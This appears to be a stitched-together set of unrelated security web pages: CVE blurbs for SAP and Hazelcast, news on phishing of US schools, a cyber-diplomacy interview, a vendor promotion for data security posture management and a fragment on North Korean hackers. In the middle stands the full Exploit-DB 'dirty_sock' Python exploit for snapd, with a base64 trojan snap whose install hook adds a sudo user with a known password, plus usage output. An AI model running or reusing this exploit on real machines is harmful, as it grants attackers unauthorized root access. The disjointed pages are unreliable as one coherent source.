The F0743 Create Single Payment application of SAP S/4HANA - versions 100, 101, 102, 103, 104, 105, 106, does not check uploaded or downloaded files. This allows an attacker with basic user rights to run arbitrary script code, resulting in sensitive information being disclosed or modified.



Wiki Communication

*   Pages

**Page tree**

Browse pages

*   

1.  Pages

Skip to end of banner

*   
*   Jira links

Go to start of banner

Skip to end of metadata

*   Created by Aryhe Segal, last modified on Jun 21, 2022

Go to start of metadata

**_Sorry. The page you are looking for is not available._****Please try the links below**

**SAP Community**

view SAP Community

**SAP Support**

help SAP Support

**SAP Business By Design**

edit Business By Design

**If all else fails, contact the Support Team at PSWIKI@sap.com**

*   No labels

Overview

Content Tools

*   Powered by Atlassian Confluence 7.13.14
*   Printed by Atlassian Confluence 7.13.14
*   Report a bug
*   Atlassian News

Atlassian

*   Privacy
*   Terms of Use
*   Legal Disclosure
*   Copyright
*   Trademark

CVE-2022-22531: Community Wiki Sunset - Wiki Communication

By Deeba Ahmed
Tycoon and Storm-1575 threat actors launched targeted spear phishing attacks to bypass MFA protections, targeting officials at large US school districts.
This is a post from HackRead.com Read the original post: Tycoon and Storm-1575 Linked to Phishing Attacks on US Schools

Tycoon and Storm-1575 groups are identified as key players, with Tycoon offering MFA bypass as a service and Storm-1575 targeting Microsoft 365 credentials.

Public schools across the United States are facing a surge in sophisticated phishing campaigns, according to a new report by PIXM, a cybersecurity firm specializing in artificial intelligence solutions.

Threat actors launch targeted spear phishing attacks using stealthy attack patterns to target officials at large US school districts, bypassing MFA protections.

The report highlights a worrying trend: attackers are increasingly employing tactics to bypass Multi-Factor Authentication (MFA), a security measure previously thought to offer robust protection.

Since December 2023, a surge in MFA-based phishing campaigns targeting US teachers, staff, and administrators has been observed, using dadsec and Phishing-as-a-Service (PhaaS) platforms to compromise administrator email accounts and deliver ransomware, researchers noted.

****Tycoon and Storm-1575****

PIXM discovered phishing activity in November 2023 and linked it to Tycoon and Storm-1575 threat groups. These groups were singled out because of their common attack pattern. Both actors use social engineering techniques, spoofing emails to appear legitimate and using AiTM (Adversary-in-the-Middle) phishing to bypass MFA tokens and session cookies.

They also create customized login experiences and use dadsec and phisingkit PhaaS services to point at legitimate sites. Their infrastructure, including C2 servers, domain generation algorithms, legitimate hosting services, and SSL certificates, allows them to control large numbers of phishing websites and avoid detection.

For your information, The Tycoon Group’s PaaS, available on Telegram for just $120, boasts key features like bypassing Microsoft’s two-factor authentication. On the other hand, Microsoft identifies Storm-1575 as a threat actor engaging in phishing campaigns through the Dadsec platform. They employ numerous Domain Generated Algorithm domains to host credential harvesting pages, targeting global organizations to extract Microsoft 365 credentials.

Tycoon group on Telegram (Screenshot: PIXM)

In the attacks, as detailed by PIXM in a blog post, targeted officials received phishing emails prompting them to update passwords. This led to encountering a Cloudflare Captcha and a spoofed Microsoft password page. If unthwarted, attackers would forward passwords to legitimate login pages, requesting two-factor authentication codes, and bypassing MFA protections.

Common targets include the Chief of Human Capital and multiple finance and payroll administrator accounts. Some attacks attempted to alter Windows registry keys, potentially infecting machines with malicious scripts. The attacks concealed their tracks using stealth tactics like hiding behind Cloudflare infrastructure and spinning up new domains.

The use of CAPTCHAs in phishing attacks can delay the delivery of the payload and provide a sense of legitimacy to end users. However, there is also a potential for malicious trojan activity, such as modifying Windows registry keys for the VBS file format and injecting a malicious file’script.vbs’. These attacks can be used for malware installation, ransomware, and data exfiltration. 

Attack flow – (Screenshot: PIXM)

****Schools, Most Targeted Industry****

While schools are the most targeted industry by ransomware gangs, student data has also been a prominent prey of cybercrime, but the extensiveness of data loss noticed recently is unprecedented. It is estimated that over 900 schools were targeted in MOVEit-linked cyber attacks.

A data leak involving Raptor Technologies in January 202, reported by cybersecurity researcher Jeremiah Fowler, exposed around 4,024,001 sensitive records belonging to students, parents, and staff, raising concerns about student privacy and school safety.

Just one month later, in February 2024, Fowler discovered a non-password-protected database storing 210,020 records or 153.76 GB of data, containing sensitive information like full names, addresses, phone numbers, and tax records of students and parents, associated with the Online Voucher Application.

To protect against such phishing attacks, organizations should identify high-priority staff with sensitive access or regular communication patterns, invest in tailored awareness efforts, arm users with caution against links and websites prompting MFA tokens and CAPTCHAs, and implement proactive AI-driven protections at the browser and email layers.

1.  Data Leak Exposes 572 GB of Student, and Faculty Info
2.  100s of schools at risk after Magecart attack on Wisepay
3.  Iranian APT group hits schools, universities in phishing attacks
4.  NIST Releases Cybersecurity Framework 2.0: Guide for All Firms
5.  Conti ransomware gang demanded $40m from US school district

Tycoon and Storm-1575 Linked to Phishing Attacks on US Schools

### Impact
In Hazelcast through 4.1.10, 4.2 through 4.2.8, 5.0 through 5.0.5, 5.1 through 5.1.7, 5.2 through 5.2.4, and 5.3 through 5.3.2, some client operations don't check permissions properly, allowing authenticated users to access data stored in the cluster.

### Patches
Fix versions: 5.2.5, 5.3.5, 5.4.0-BETA-1

### Workarounds
There is no known workaround.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-45859

**Missing permission checks on Hazelcast client protocol**

High severity GitHub Reviewed Published Feb 27, 2024 in hazelcast/hazelcast • Updated Feb 27, 2024

**Package**

maven com.hazelcast:hazelcast (Maven)

**Affected versions**

<= 4.1.10

\>= 4.2, <= 4.2.8

\>= 5.0, <= 5.0.5

\>= 5.1, <= 5.1.7

\>= 5.2.0, <= 5.2.4

\>= 5.3.0, < 5.3.5

**Patched versions**

5.2.5

5.3.5

**Description**

**Impact**

In Hazelcast through 4.1.10, 4.2 through 4.2.8, 5.0 through 5.0.5, 5.1 through 5.1.7, 5.2 through 5.2.4, and 5.3 through 5.3.2, some client operations don't check permissions properly, allowing authenticated users to access data stored in the cluster.

**Patches**

Fix versions: 5.2.5, 5.3.5, 5.4.0-BETA-1

**Workarounds**

There is no known workaround.

**References**

*   GHSA-xh6m-7cr7-xx66

Published to the GitHub Advisory Database

Feb 27, 2024

Last updated

Feb 27, 2024

GHSA-xh6m-7cr7-xx66: Missing permission checks on Hazelcast client protocol

Canonical snapd before version 2.37.1 incorrectly performed socket owner validation, allowing an attacker to run arbitrary commands as root. This issue affects: Canonical snapd versions prior to 2.37.1.

**snapd < 2.37 (Ubuntu) - 'dirty\_sock' Local Privilege Escalation (2)**

**Platform:****Linux**

**Date:****2019-02-13**

  

    #!/usr/bin/env python3
    
    """
    # dirty_sock: Privilege Escalation in Ubuntu (via snapd)
    In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the <a href="https://initblog.com/2019/dirty-sock/" target="_blank"> blog posting here</a>.
    
    You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.
    ```
    $ snap version
    ...
    snapd   2.37.1
    ...
    ```
    
    # Usage
    ## Version One (use in most cases)
    This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value.
    
    Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.
    
    To exploit, first create an account at the <a href="https://login.ubuntu.com/" target="_blank">Ubuntu SSO</a>. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded):
    
    ```
    python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"
    
    [+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
    [+] Binding to socket file...
    [+] Connecting to snapd API...
    [+] Sending payload...
    [+] Success! Enjoy your new account with sudo rights!
    
    [Script will automatically ssh to localhost with the SSH key here]
    ```
    
    ## Version Two (use in special cases)
    This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.
    
    dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.
    
    As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments.
    
    This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.
    
    Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.
    
    To exploit, simply run the script with no arguments on a vulnerable system.
    
    ```
    python3 ./dirty_sockv2.py
    
    [+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
    [+] Binding to socket file...
    [+] Connecting to snapd API...
    [+] Deleting trojan snap (and sleeping 5 seconds)...
    [+] Installing the trojan snap (and sleeping 8 seconds)...
    [+] Deleting trojan snap (and sleeping 5 seconds)...
    
    ********************
    Success! You can now `su` to the following account and use sudo:
       username: dirty_sock
       password: dirty_sock
    ********************
    
    ```
    
    
    # Troubleshooting
    If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.
    
    Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).
    
    Please open issues for anything weird.
    
    # Disclosure Info
    The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread <a href="https://bugs.launchpad.net/snapd/+bug/1813365" target="_blank">here</a>.
    
    I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.
    
    Public advisory links:
    - https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
    - https://usn.ubuntu.com/3887-1/
    
    
    Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46361.zip
    """
    
    """
    Local privilege escalation via snapd, affecting Ubuntu and others.
    
    v2 of dirty_sock leverages the /v2/snaps API to sideload an empty snap
    with an install hook that creates a new user.
    
    v1 is recommended is most situations as it is less intrusive.
    
    Simply run as is, no arguments, no requirements. If the exploit is successful,
    the system will have a new user with sudo permissions as follows:
      username: dirty_sock
      password: dirty_sock
    
    You can execute su dirty_sock when the exploit is complete. See the github page
    for troubleshooting.
    
    Research and POC by initstring (https://github.com/initstring/dirty_sock)
    """
    
    import string
    import random
    import socket
    import base64
    import time
    import sys
    import os
    
    BANNER = r'''
          ___  _ ____ ___ _   _     ____ ____ ____ _  _ 
          |  \ | |__/  |   \_/      [__  |  | |    |_/  
          |__/ | |  \  |    |   ___ ___] |__| |___ | \_ 
                           (version 2)
    
    //=========[]==========================================\\
    || R&D     || initstring (@init_string)                ||
    || Source  || https://github.com/initstring/dirty_sock ||
    || Details || https://initblog.com/2019/dirty-sock     ||
    \\=========[]==========================================//
    
    '''
    
    
    # The following global is a base64 encoded string representing an installable
    # snap package. The snap itself is empty and has no functionality. It does,
    # however, have a bash-script in the install hook that will create a new user.
    # For full details, read the blog linked on the github page above.
    TROJAN_SNAP = ('''
    aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
    /////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
    ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
    TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
    T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
    Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
    ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
    ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
    L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
    b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
    rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
    rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
    AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
    XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
    RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
    AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
                   + 'A' * 4256 + '==')
    
    def check_args():
        """Return short help if any args given"""
        if len(sys.argv) > 1:
            print("\n\n"
                  "No arguments needed for this version. Simply run and enjoy."
                  "\n\n")
            sys.exit()
    
    def create_sockfile():
        """Generates a random socket file name to use"""
        alphabet = string.ascii_lowercase
        random_string = ''.join(random.choice(alphabet) for i in range(10))
        dirty_sock = ';uid=0;'
    
        # This is where we slip on the dirty sock. This makes its way into the
        # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
        # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
        sockfile = '/tmp/' + random_string + dirty_sock
    
        print("[+] Slipped dirty sock on random socket file: " + sockfile)
    
        return sockfile
    
    def bind_sock(sockfile):
        """Binds to a local file"""
        # This exploit only works if we also BIND to the socket after creating
        # it, as we need to inject the dirty sock as a remote peer in the
        # socket's ancillary data.
        print("[+] Binding to socket file...")
        client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        client_sock.bind(sockfile)
    
        # Connect to the snap daemon
        print("[+] Connecting to snapd API...")
        client_sock.connect('/run/snapd.socket')
    
        return client_sock
    
    def delete_snap(client_sock):
        """Deletes the trojan snap, if installed"""
        post_payload = ('{"action": "remove",'
                        ' "snaps": ["dirty-sock"]}')
        http_req = ('POST /v2/snaps HTTP/1.1\r\n'
                    'Host: localhost\r\n'
                    'Content-Type: application/json\r\n'
                    'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
                    + post_payload)
    
        # Send our payload to the snap API
        print("[+] Deleting trojan snap (and sleeping 5 seconds)...")
        client_sock.sendall(http_req.encode("utf-8"))
    
        # Receive the data and extract the JSON
        http_reply = client_sock.recv(8192).decode("utf-8")
    
        # Exit on probably-not-vulnerable
        if '"status":"Unauthorized"' in http_reply:
            print("[!] System may not be vulnerable, here is the API reply:\n\n")
            print(http_reply)
            sys.exit()
    
        # Exit on failure
        if 'status-code":202' not in http_reply:
            print("[!] Did not work, here is the API reply:\n\n")
            print(http_reply)
            sys.exit()
    
        # We sleep to allow the API command to complete, otherwise the install
        # may fail.
        time.sleep(5)
    
    def install_snap(client_sock):
        """Sideloads the trojan snap"""
    
        # Decode the base64 from above back into bytes
        blob = base64.b64decode(TROJAN_SNAP)
    
        # Configure the multi-part form upload boundary here:
        boundary = '------------------------f8c156143a1caf97'
    
        # Construct the POST payload for the /v2/snap API, per the instructions
        # here: https://github.com/snapcore/snapd/wiki/REST-API
        # This follows the 'sideloading' process.
        post_payload = '''
    --------------------------f8c156143a1caf97
    Content-Disposition: form-data; name="devmode"
    
    true
    --------------------------f8c156143a1caf97
    Content-Disposition: form-data; name="snap"; filename="snap.snap"
    Content-Type: application/octet-stream
    
    ''' + blob.decode('latin-1') + '''
    --------------------------f8c156143a1caf97--'''
    
    
        # Multi-part forum uploads are weird. First, we post the headers
        # and wait for an HTTP 100 reply. THEN we can send the payload.
        http_req1 = ('POST /v2/snaps HTTP/1.1\r\n'
                     'Host: localhost\r\n'
                     'Content-Type: multipart/form-data; boundary='
                     + boundary + '\r\n'
                     'Expect: 100-continue\r\n'
                     'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n')
    
        # Send the headers to the snap API
        print("[+] Installing the trojan snap (and sleeping 8 seconds)...")
        client_sock.sendall(http_req1.encode("utf-8"))
    
        # Receive the initial HTTP/1.1 100 Continue reply
        http_reply = client_sock.recv(8192).decode("utf-8")
    
        if 'HTTP/1.1 100 Continue' not in http_reply:
            print("[!] Error starting POST conversation, here is the reply:\n\n")
            print(http_reply)
            sys.exit()
    
        # Now we can send the payload
        http_req2 = post_payload
        client_sock.sendall(http_req2.encode("latin-1"))
    
        # Receive the data and extract the JSON
        http_reply = client_sock.recv(8192).decode("utf-8")
    
        # Exit on failure
        if 'status-code":202' not in http_reply:
            print("[!] Did not work, here is the API reply:\n\n")
            print(http_reply)
            sys.exit()
    
        # Sleep to allow time for the snap to install correctly. Otherwise,
        # The uninstall that follows will fail, leaving unnecessary traces
        # on the machine.
        time.sleep(8)
    
    def print_success():
        """Prints a success message if we've made it this far"""
        print("\n\n")
        print("********************")
        print("Success! You can now `su` to the following account and use sudo:")
        print("   username: dirty_sock")
        print("   password: dirty_sock")
        print("********************")
        print("\n\n")
    
    
    def main():
        """Main program function"""
    
        # Gotta have a banner...
        print(BANNER)
    
        # Check for any args (none needed)
        check_args()
    
        # Create a random name for the dirty socket file
        sockfile = create_sockfile()
    
        # Bind the dirty socket to the snapdapi
        client_sock = bind_sock(sockfile)
    
        # Delete trojan snap, in case there was a previous install attempt
        delete_snap(client_sock)
    
        # Install the trojan snap, which has an install hook that creates a user
        install_snap(client_sock)
    
        # Delete the trojan snap
        delete_snap(client_sock)
    
        # Remove the dirty socket file
        os.remove(sockfile)
    
        # Congratulate the lucky hacker
        print_success()
    
    
    if __name__ == '__main__':
        main()

CVE-2019-7304: Offensive Security’s Exploit Database Archive

Nathaniel Fick, the ambassador for cyberspace and digital policy, has led US tech diplomacy amid a rising tide of pressure from authoritarian regimes. Will the Trump administration undo that work?

European governments wonder if Trump will continue US support of Ukraine and NATO in a conflict with Russia that has partly played out in cyberspace. Fick’s team was instrumental in establishing a process for rapidly delivering cyber-defense aid to Ukraine’s battered government.

“I was in Ukraine right before Christmas, I was in Poland, I was in Estonia, kind of up and down NATO's eastern flank,” he says, adding that he sensed “both a deep desire for the United States to stay engaged and a recognition that European partners are going to need to do their share—which they, by the way, increasingly are doing.”

More broadly, Fick has heard “a strong desire among many allies and partners” for the US to continue going toe to toe with China and Russia in tech and cyber discussions in international bodies like the UN and the Group of 20.

“Without the United States deeply involved, you're going to see the Chinese more deeply involved, you're going to see the Russians more deeply involved,” Fick says. “There's a pretty broad view \[globally\] that the US needs to, for its own interests and for the interests of our allies and partners, stay engaged in multilateral organizations.”

Fick sympathizes with Republicans who consider these multilateral organizations too slow and timid, but he wants Trump’s team to “recognize that the alternative is not diminished influence of these organizations; the alternative is simply that they become playgrounds for our competitors and our adversaries.”

**Celebrating “a Sea Change”**

Looking back on his time as America’s cyber ambassador—which saw him spend a total of more than 200 days traveling the world on nearly 80 trips to visit key US allies and partners—Fick is proud of how his team launched an entirely new bureau inside the State Department, grew it to around 130 employees, and delivered results that he says are transforming digital diplomacy.

One of his biggest accomplishments was the launch of a foreign cyber aid fund that will support programs to deploy security assistance to hack-stricken allies, subsidize new undersea cables, and train foreign diplomats on cyber issues.

The security-assistance project saw an early test in November when Costa Rica faced another major ransomware attack. “We had people on a plane the next morning, Thanksgiving morning, with hands on keyboards alongside Costa Rican partners that night,” Fick says. “That’s amazing. That is a sea change in how we do this, and it’s going to strengthen our hand in providing support to these middle-ground states.”

Fick has also focused on preparing the Foreign Service for the modern world, meeting his goal of training at least one tech-savvy diplomat for every foreign embassy (around 237 total) and successfully lobbying to add digital fluency to the State Department’s criteria for career ambassador positions. He has also helped State counterbalance the Pentagon in White House discussions about foreign tech issues—putting “American diplomacy literally back at the table in the Situation Room on technology topics.”

And then there’s his team’s support for US cyber aid to Ukraine, from security software to satellite communications to cloud migration for vital government data—work that he says offers a template for future public-private foreign-aid partnerships.

**One Final Warning**

Fick has shared his thoughts about China, 5G, AI, deterrence, and other cyber issues with Trump’s transition team, and he says there’s still more to do to keep cyber diplomacy “front and center” at State. But as he prepares to leave government, he has one major piece of advice for the incoming administration.

“It is essential to have a bias for action,” he says. “We end up admiring a problem for too long rather than taking a decisive step to address it … That decisive step may be imperfect, but indecision is a decision, and the world moves on without you.”

Put another way: In an era of rapidly evolving technologies and intensifying geopolitical competition, massive bureaucracies like the State Department sometimes need to be jolted into action.

“The job of the leaders in these big organizations,” Fick says, “is to move the org to change a little bit faster than it would on its own.”

Biden's Cyber Ambassador Urges Trump Not to Cede Ground to Russia and China in Global Tech Fight

Data security is reinventing itself. As new data security posture management solutions come to market, organizations are increasingly recognizing the opportunity to provide evidence-based security that proves how their data is being protected. But what exactly is data security posture, and how do you manage it? 
Data security posture management (DSPM) became mainstream following the publication

Data security is reinventing itself. As new data security posture management solutions come to market, organizations are increasingly recognizing the opportunity to provide evidence-based security that proves how their data is being protected. But what exactly is data security posture, and how do you manage it?

Data security posture management (DSPM) became mainstream following the publication of Gartner® Cool Vendors™ in Data Security—Secure and Accelerate Advanced Use Cases. In that report, Gartner1 seems to have kicked off the popular use of the data security posture management term and massive investment in this space by every VC. Since that report, Gartner has identified at least 16 DSPM vendors, including Symmetry Systems.

**What is Data Security Posture?**

There certainly is a lot being marketed and published about data security posture management solutions themselves, but we first wanted to dig into what is data security posture?

Symmetry Systems defines data security posture as "...the current status of the capabilities required to protect data from unauthorized access, destruction, and/or alteration. Data security posture is an assessment of an organization's data store or individual data objects:

**Data attack surface**: A mapping of the data to the identities, vulnerabilities, and other misconfigurations that can be used as entry points to gain access to it.

**Data security control effectiveness:** An evidence-based assessment of the data security and privacy controls against industry best practices and organizational policy.

**Data blast radius:** A quantifiable assessment of the data at risk or the maximum potential impact of a security breach of a single identity, data store, vulnerability, or misconfiguration. This includes identifying the types and volumes of data that could be affected, as well as the estimated costs and predicted consequences based on current control effectiveness.

Overall, a robust organizational data security posture involves a comprehensive approach to managing the security of an organization's data, including continuous inventory and classification of data, ongoing assessment and improvement of data security controls, proactive rightsizing of access to data, and a commitment to continuous monitoring and response to unusual usage of data."

To maintain a good data security posture, organizations should do the following:

**Inventory your data:** A data inventory—that is a comprehensive list of all data stores and the sensitivity of the data within them—is an essential first step in determining the current status of capabilities.

**Monitor data activity and data flows:** An important next step is to ensure you have visibility into activity and the flow of your data, because it improves your ability to detect and respond to any anomalies or indicators of compromise as you improve your data security posture.

**Assess data security controls:** Once you have this visibility and insight into your data, you can conduct an evidence-based assessment of your data security controls. This should include determining the level of encryption of the data, the validity of hashing and tokenization of data in certain environments, and most importantly the validation of cloud configurations and access controls, including authentication required to access data.

**Reduce data attack surface:** Organizations should have processes in place to use the results of this analysis to proactively identify and reduce the data attack surface. This should include ensuring multi-factor authentication is required for all identities with access to sensitive data and data stores that contain sensitive data and removing dormant accounts from the environment.

**Minimize blast radius:** Organizations must constantly assess the volume of data at risk and prioritize pragmatic steps to minimize the potential impact of a security breach of a single identity, data store, vulnerability, or misconfiguration. This should include removing sensitive data from inappropriate environments, identifying, and eliminating misconfigurations, and data minimization by archiving or deleting data or by deleting unused privileges from active accounts.

**The Symmetry DataGuard Solution**

Symmetry DataGuard is a purpose-built data security posture management platform. Symmetry DataGuard doesn't simply augment existing SaaS platforms with data classification to claim DSPM coverage; instead, it was designed from the ground up to maximize the protection of data. The platform is typically deployed within the customer's cloud environment as a way to ensure that data never leaves the customer's control. This deployment model is well suited for dealing with data, regardless of sensitivity and various compliance regulations.

At its core, the Symmetry DataGuard platform has a deep graph of data objects, identities, and all permissions to and actions that are performed on the data objects. This interconnected graph is used to provide the elements needed for organizations to manage their data security posture. We reviewed the Symmetry Solution to see how it helps organizations address a few key areas.

**Data Inventory**

Once installed and configured, Symmetry DataGuard gathers information from the cloud environments. This is made easier by installing within the customer's cloud environment, but as long as Symmetry DataGuard has appropriate permissions to query the data, it can aggregate information across your cloud environments. To avoid unnecessary data egress fees, Symmetry Systems recommends deploying Symmetry DataGuard in each cloud environment (i.e., AWS, Azure, etc.). Agentless discovery quickly collects information about:

*   The cloud environment.
*   The identities (including users, services, roles, and groups) with access to the environment.
*   The datastores within the environment.

Examples of the environment inventory data collected by Symmetry DataGuard are shown in the image below:

Figure 1: Data environment inventory data collected by Symmetry DataGuard

Information obtained here is used to kickstart sampling of the data within the identified datastores. The sampling approach is fully customizable. Symmetry DataGuard provides a robust catalog of prebuilt data identifiers that use a combination of keywords, regex pattern matching, and machine learning-based matching to identify and classify an organization's data within the identified datastores. Symmetry Systems works with their customers to build, customize, and improve the set of identifiers to increase the accuracy of their classification process.

This insight into the classification of data within each data store is added to the deep graph and provides organizations with searchable views and visualizations of their data inventory. Examples of this data inventory are surprisingly beautiful and shown in the image below:

Figure 2: Data visualizations help increase the accuracy of the data classification process by mapping identities, access, data types, and where the data is stored.

**Monitor Data Activity and Data Flows**

As part of the discovery and ongoing monitoring of the environment, Symmetry DataGuard collects telemetry on all the data activity or data operations being performed on data within your environment. This includes failed and denied attempts. This telemetry is used to deepen the insight provided on who is accessing an organization's data and where that data is flowing to or from as a result.

This information is cross-correlated with the data inventory to help organizations pinpoint external data flows, failed attempts to access sensitive data, and a number of other interesting data-centric threat detection scenarios. An example visualization of these flows is shown below:

Figure 3: Data flows help organizations pinpoint data-centric threat detection scenarios

Operations are grouped into four high-level classes: creation, read, update, or deletion of data. This helps when prioritizing unusual or high-risk activity against specific data.

**Perform Assessment of Data Security Controls**

Symmetry DataGuard also assesses the data security and identity configurations and can raise alerts when configurations fail to meet defined policies or are changed. These configurations include, but are not limited to, determining whether:

*   Data is encrypted. (This includes native.)
*   MFA is enabled.
*   Monitoring is enabled.

Symmetry DataGuard has out-of-the-box compliance policies that are used to check for compliance with data-centric portions of the Center of Internet Security (CIS) benchmarks and other compliance frameworks. Examples of the compliance dashboard are shown below:

Figure 4:The Symmetry DataGuard compliance dashboards include out-of-the-box compliance policies that are used to check for compliance with data-centric portions of the Center of Internet Security (CIS) benchmarks and other compliance frameworks

Each compliance check on the compliance dashboard contains information about the configuration that was checked and the remediation steps to address it. We expand one of the compliance checks and get the following detailed result:

Figure 5: Compliance checks include information on the configuration and remediation steps

With the compliance dashboard, organizations are able to check their data for misconfigurations and compliance with various regulatory frameworks (PCI DSS, SOC 2 etc.). The compliance checks done by Symmetry DataGuard are more precise than other compliance configurations performed at the cloud infrastructure and are crucial for organizations in heavily regulated industries.

****The Takeaway****

A good data security posture reduces the attack surface and blast radius of your organization's data. Achieving and maintaining a good data security posture requires a detailed understanding of the data itself, the identities that can access it, the controls that protect it and monitoring of the operations being performed. A leading platform like Symmetry DataGuard is able to maintain data inventory, monitor operations and activity and check for secure data security configuration and compliance, and thereby provide evidence-based data security.

If you are interested in finding out more about Symmetry Systems and their data security posture management solution, Symmetry DataGuard, You can request a demo at Symmetry-Systems.com.

Found this article interesting? Follow The Hacker News on Twitter and LinkedIn to read more exclusive content.

_1Gartner, Cool Vendors in Data Security — Secure and Accelerate Advanced Use Cases, by Joerg Fritsch, Andrew Bales, Ravisha Chugh, Brian Lowans, Mark Horvath, 19 April 2022_

****Gartner Disclaimer****

_Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose._

_GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, Hype Cycle and Cool Vendors are registered trademarks of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Importance of Managing Your Data Security Posture

North Korean state-sponsored actors, who help economically prop up Kim Jong Un's dictatorship, continue to pummel US infrastructure.

The federal Rewards for Justice program has doubled, to $10 million, the available reward for useful information about North Korean state-sponsored actors' attacks on US healthcare systems and other critical infrastructure.

The State Department has a Tor-based tip line where anyone can submit information they have on North Korean-sponsored threat actors, including Lazarus Group, Kimsuky, BlueNoroff, and Andariel, all linked to the DPRK government apparatus.

Earlier this month, the FBI, US Cybersecurity and Infrastructure Agency (CISA), and the Treasury Department issued a warning that North Korean state-sponsored actors are attacking the US healthcare and public health sectors with a new ransomware tool called Maui.

Also in July, Microsoft warned that a North Korean APT threat it calls DEV-0530 has been using a custom ransomware dubbed H0lyGh0st to successfully compromise small businesses in multiple countries.

